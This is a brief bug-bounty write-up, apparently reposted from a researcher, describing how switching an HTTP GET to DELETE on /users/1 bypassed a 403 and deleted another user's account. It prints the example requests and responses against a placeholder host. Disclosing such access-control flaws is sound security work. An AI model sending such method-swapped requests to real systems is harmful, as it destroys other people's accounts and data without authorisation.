Beware of Method Swapping: Unveiling a Potential Security Vulnerability

7 months ago 105
BOOK THIS SPACE FOR AD
ARTICLE AD

HooS

In the ever-changing field of cybersecurity, being vigilant is essential. Every technological development raises the possibility of the emergence of new vulnerabilities. The manipulation of HTTP methods is one such vulnerability that has recently come to light and puts sensitive data and user credentials at risk. This flaw, called “Method Swapping,” takes use of the interchangeability of HTTP methods to quickly and easily carry out illegal operations, such canceling user accounts.

HTTP (Hypertext Transfer Protocol) governs the communication between clients and servers on the World Wide Web. It defines a set of request methods to indicate the desired action to be performed for a given resource. Common HTTP methods include GET, POST, PUT, and DELETE, each serving a distinct purpose:

GET: Retrieves data from the server.POST: Submits data to be processed to the server.PUT: Updates a resource on the server.DELETE: Removes a resource from the server.

But nobody ever explores the potential of these methods in a route.

I discovered a vulnerability that allowed me to delete any user’s account simply by changing the request method

Example:

GET /users/1 HTTP/2
Host: website.com

Response:

HTTP/2 403 Forbidden

BUT if I change the method?? 🤔

Request:

DELETE /users/1 HTTP/2
Host: website.com

Response:

HTTP/2 200 OK

WHAT? It’s worked!! I have deleted account of user 1.

I recommend that instead of looking for something more complex, sometimes the simplest thing is something critical.

YesWeHack report
Read Entire Article